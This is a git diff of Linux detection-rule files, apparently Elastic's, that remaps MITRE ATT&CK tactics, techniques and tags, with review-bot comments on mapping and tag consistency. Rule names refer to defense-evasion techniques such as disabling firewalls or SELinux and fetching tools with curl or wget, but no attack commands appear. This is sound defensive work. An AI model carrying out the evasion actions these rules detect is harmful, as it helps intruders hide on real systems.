-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
+id = "T1562.012"
+name = "Disable or Modify Linux Audit System"
+reference = "https://attack.mitre.org/techniques/T1562/012/"
 
 [rule.threat.tactic]
 id = "TA0005"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
index f1d091298b1..13326263087 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/02/22"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -123,9 +123,9 @@ name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
 [[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
+id = "T1562.004"
+name = "Disable or Modify System Firewall"
+reference = "https://attack.mitre.org/techniques/T1562/004/"
 
 [rule.threat.tactic]
 id = "TA0005"
diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
index 716db12a621..3b30d99c0cd 100644
--- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
+++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml
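Review bot: `T1562.012` (Disable or Modify Linux Audit System) only exists in ATT&CK v14 and later, so the auditd hunk will pass the repository's technique-id validation only if the pinned ATT&CK data is at least that version; the neighbouring firewall hunk uses the long-standing `T1562.004` and would not surface the problem if the data is older. Worth confirming the pinned attack data before merge, and keeping `T1562.001` on the auditd rule until it is bumped if it is not. The subtechnique name and reference URL match the published entry, so nothing else in the mapping needs to change.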
@@ -2,7 +2,7 @@
 creation_date = "2020/04/27"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -132,11 +132,6 @@ id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
index b1c2b0ae4e9..0f03df2bf50 100644
--- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
+++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -80,14 +80,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Defense Evasion",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -105,16 +98,11 @@ not (
 framework = "MITRE ATT&CK"
 
 [[rule.threat.technique]]
-id = "T1070"
-name = "Indicator Removal"
-reference = "https://attack.mitre.org/techniques/T1070/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1070.004"
-name = "File Deletion"
-reference = "https://attack.mitre.org/techniques/T1070/004/"
+id = "T1531"
+name = "Account Access Removal"
+reference = "https://attack.mitre.org/techniques/T1531/"
 
 [rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml
index 375a8b62e4e..2374ff50bea 100644
--- a/rules/linux/defense_evasion_base64_decoding_activity.toml
+++ b/rules/linux/defense_evasion_base64_decoding_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/01/16"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -173,11 +173,6 @@ from logs-endpoint.events.process-* metadata _id, _index, _version
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
-
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
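Review bot: Remapping the authorized_keys deletion rule wholesale from Defense Evasion/T1070.004 to Impact/T1531 drops the hypothesis that the file name and `defense_evasion_` prefix still advertise: an attacker removing a key it planted is Indicator Removal (File Deletion), whereas T1531 covers locking a legitimate user out, and a single file deletion event cannot distinguish the two. Consider keeping both by leaving the existing `T1070`/`T1070.004` entry under Defense Evasion and adding the new Impact entry as a second `[[rule.threat]]` table, with `"Tactic: Defense Evasion"` restored alongside `"Tactic: Impact"` in `tags`. If the single-tactic remap is intentional, the rule description and filename should say so, since the current naming now contradicts the mapping; the description is outside this hunk.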
@@ -187,31 +182,3 @@ reference = "https://attack.mitre.org/techniques/T1140/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml
index 2a3b2c93dca..315be4335f6 100644
--- a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml
+++ b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -119,11 +119,6 @@ id = "T1036.003"
 name = "Rename Legitimate Utilities"
 reference = "https://attack.mitre.org/techniques/T1036/003/"
 
-[[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml
index f23dcdf2669..50f16c631cf 100644
--- a/rules/linux/defense_evasion_bpf_program_tampering.toml
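Review bot: The Execution `[[rule.threat]]` entry is removed here, but this file's diff contains only the `updated_date` hunk and the two threat hunks — no change to `tags` — so if the base64 rule's tag list still carries `"Tactic: Execution"` it is now an orphan tactic tag with no backing threat entry. Every other rule in this patch that drops a tactic also drops the matching `Tactic:` tag in the same commit, and a tags/threat consistency check would flag this one as inconsistent. Suggest removing `"Tactic: Execution"` from `tags` in the same commit; I cannot see that line from this hunk, so confirm against the file.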
+++ b/rules/linux/defense_evasion_bpf_program_tampering.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/20"
 integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/02/20"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -99,11 +99,6 @@ id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
 
-[[rule.threat.technique]]
-id = "T1014"
-name = "Rootkit"
-reference = "https://attack.mitre.org/techniques/T1014/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml
index b3f77d4cefc..736eb093333 100644
--- a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml
+++ b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/10/24"
 integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -117,16 +117,6 @@ id = "T1070.002"
 name = "Clear Linux or Mac System Logs"
 reference = "https://attack.mitre.org/techniques/T1070/002/"
 
-[[rule.threat.technique]]
-id = "T1562"
-name = "Impair Defenses"
-reference = "https://attack.mitre.org/techniques/T1562/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
index 05fae4d0549..8e8fee50ff4 100644
--- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
+++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/11/20"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/11/24"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -77,17 +77,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Defense Evasion",
-    "Tactic: Execution",
-    "Tactic: Command and Control",
-    "Tactic: Exfiltration",
-    "Data Source: Elastic Defend",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 type = "eql"
 query = '''
 sequence with maxspan=3s
@@ -144,46 +134,25 @@ sequence with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-  [rule.threat.tactic]
-  name = "Defense Evasion"
-  id = "TA0005"
-  reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1105"
+name = "Ingress Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1105/"
 
-  [[rule.threat.technique]]
-  id = "T1218"
-  name = "System Binary Proxy Execution"
-  reference = "https://attack.mitre.org/techniques/T1218/"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
 
 [[rule.threat]]
 framework = "MITRE ATT&CK"
 
-  [rule.threat.tactic]
-  name = "Execution"
-  id = "TA0002"
-  reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat.technique]]
+id = "T1218"
+name = "System Binary Proxy Execution"
+reference = "https://attack.mitre.org/techniques/T1218/"
 
-  [[rule.threat.technique]]
-  id = "T1059"
-  name = "Command and Scripting Interpreter"
-  reference = "https://attack.mitre.org/techniques/T1059/"
-
-  [[rule.threat.technique.subtechnique]]
-  name = "Unix Shell"
-  id = "T1059.004"
-  reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-  [rule.threat.tactic]
-  id = "TA0011"
-  name = "Command and Control"
-  reference = "https://attack.mitre.org/tactics/TA0011/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-  [rule.threat.tactic]
-  id = "TA0010"
-  name = "Exfiltration"
-  reference = "https://attack.mitre.org/tactics/TA0010/"
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml
index 450965c1864..061fea69f52 100644
--- a/rules/linux/defense_evasion_directory_creation_in_bin.toml
+++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml
@@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -83,18 +83,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -122,11 +111,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml index b6e65ea7aca..c2cbb5316e5 100644 --- a/rules/linux/defense_evasion_disable_selinux_attempt.toml +++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -125,11 +125,6 @@ id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
 
-[[rule.threat.technique.subtechnique]]
-id = "T1562.001"
-name = "Disable or Modify Tools"
-reference = "https://attack.mitre.org/techniques/T1562/001/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
index 8f0a8af6a0e..ea2413b54ff 100644
--- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
+++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/28"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 
 [rule]
 author = ["Elastic"]
@@ -79,16 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
-    "Domain: Endpoint",
-    "OS: Linux",
-    "Use Case: Threat Detection",
-    "Tactic: Defense Evasion",
-    "Data Source: Elastic Defend",
-    "Data Source: Elastic Endgame",
-    "Data Source: SentinelOne",
-    "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -103,12 +94,20 @@ id = "T1548"
 name = "Abuse Elevation Control Mechanism"
 reference = "https://attack.mitre.org/techniques/T1548/"
-[[rule.threat.technique.subtechnique]]
-id = "T1548.003"
-name = "Sudo and Sudo Caching"
-reference = "https://attack.mitre.org/techniques/T1548/003/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1548"
+name = "Abuse Elevation Control Mechanism"
+reference = "https://attack.mitre.org/techniques/T1548/"
+
+[rule.threat.tactic]
+id = "TA0004"
+name = "Privilege Escalation"
+reference = "https://attack.mitre.org/tactics/TA0004/"
diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml
index b838709d6db..5fe58a162db 100644
--- a/rules/linux/defense_evasion_file_mod_writable_dir.toml
+++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/21"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -131,11 +131,15 @@ id = "T1222"
 name = "File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/"
+[[rule.threat.technique.subtechnique]]
+id = "T1222.002"
+name = "Linux and Mac File and Directory Permissions Modification"
+reference = "https://attack.mitre.org/techniques/T1222/002/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["host.id", "process.parent.executable", "process.command_line"]
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
index 96000cee0bf..7091c85fb0f 100644
--- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/29"
 integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -84,19 +84,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Tactic: Execution",
- "Data Source: Auditd Manager",
- "Data Source: Elastic Defend",
- "Data Source: Elastic Endgame",
- "Data Source: Crowdstrike",
- "Data Source: SentinelOne",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -116,40 +104,12 @@ id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
index 62bddb86804..ff3937346a6 100644
--- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
+++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -128,11 +128,6 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1027"
-name = "Obfuscated Files or Information"
-reference = "https://attack.mitre.org/techniques/T1027/"
-
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
@@ -151,21 +146,6 @@ id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.004"
-name = "Unix Shell"
-reference = "https://attack.mitre.org/techniques/T1059/004/"
-
-[[rule.threat.technique]]
-id = "T1204"
-name = "User Execution"
-reference = "https://attack.mitre.org/techniques/T1204/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1204.002"
-name = "Malicious File"
-reference = "https://attack.mitre.org/techniques/T1204/002/"
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
diff --git a/rules/linux/defense_evasion_hidden_directory_creation.toml b/rules/linux/defense_evasion_hidden_directory_creation.toml
index 59a908829de..aaaaf7ab199 100644
--- a/rules/linux/defense_evasion_hidden_directory_creation.toml
+++ b/rules/linux/defense_evasion_hidden_directory_creation.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/01"
 integration = ["endpoint", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -85,17 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Tactic: Persistence",
- "Data Source: SentinelOne",
- "Data Source: Elastic Endgame",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -131,11 +121,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
index bb71c416c74..bcb12bbfe9a 100644
--- a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
+++ b/rules/linux/defense_evasion_hidden_file_dir_tmp.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -139,11 +139,3 @@ reference = "https://attack.mitre.org/techniques/T1564/001/"
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
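Review bot: The `@@ -139,11 +139,3 @@` hunk for defense_evasion_hidden_file_dir_tmp.toml removes the `TA0003` Persistence threat entry, but this diff touches nothing else in that file between its `updated_date` hunk and line 139, so its `tags` block is unchanged; if that block still carries `Tactic: Persistence`, the tag list and the threat mapping now disagree, whereas hidden_directory_creation.toml above updates both together. The same pattern appears in kernel_module_removal.toml (Persistence entry removed, no `tags` hunk) and kill_command_executed.toml (Execution entry removed, no `tags` hunk). Please confirm those three tag lists, or add the matching `Tactic:` removal to this commit so tags and `[[rule.threat]]` stay in step.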
diff --git a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
index 46ad1a21591..c31d30624ef 100644
--- a/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
+++ b/rules/linux/defense_evasion_interactive_shell_from_system_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/11/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/18"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "medium"
-tags = [
- "Domain: Endpoint",
- "OS: Linux",
- "Use Case: Threat Detection",
- "Tactic: Defense Evasion",
- "Data Source: Elastic Defend",
- "Resources: Investigation Guide"
-]
+tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
@@ -124,21 +117,20 @@ In Linux environments, system users are typically non-interactive and serve spec
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[rule.threat.tactic]
-name = "Defense Evasion"
-id = "TA0005"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [[rule.threat.technique]]
-id = "T1564"
-name = "Hide Artifacts"
-reference = "https://attack.mitre.org/techniques/T1564/"
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
 [[rule.threat.technique.subtechnique]]
-id = "T1564.002"
-name = "Hidden Users"
-reference = "https://attack.mitre.org/techniques/T1564/002/"
+id = "T1059.004"
+name = "Unix Shell"
+reference = "https://attack.mitre.org/techniques/T1059/004/"
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
index 1ac5aa2f508..b3d9a7b222f 100644
--- a/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
+++ b/rules/linux/defense_evasion_interpreter_launched_from_decoded_payload.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/02/21"
 integration = ["endpoint", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/04"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
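Review bot: After this hunk defense_evasion_interactive_shell_from_system_user.toml maps only the Execution tactic (`TA0002` with T1059.004) and its tag was switched to `Tactic: Execution`, yet the file keeps its `defense_evasion_` prefix; if rule files in this tree are named by their primary tactic, a rename or a short note on why the prefix stays would keep the naming consistent. The same question applies to ld_so_creation.toml, which after its hunk keeps only Persistence, and rename_esxi_files.toml, whose tag becomes `Tactic: Impact`. Moving from Hide Artifacts / Hidden Users to Unix Shell also changes the ATT&CK coverage this rule reports, so the coverage maps or changelog that summarise tactic coverage may need the corresponding update.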
@@ -126,45 +126,30 @@ sequence by host.id, process.parent.entity_id with maxspan=3s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
- [rule.threat.tactic]
- name = "Defense Evasion"
- id = "TA0005"
- reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat.technique]]
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
- [[rule.threat.technique]]
- name = "Obfuscated Files or Information"
- id = "T1027"
- reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
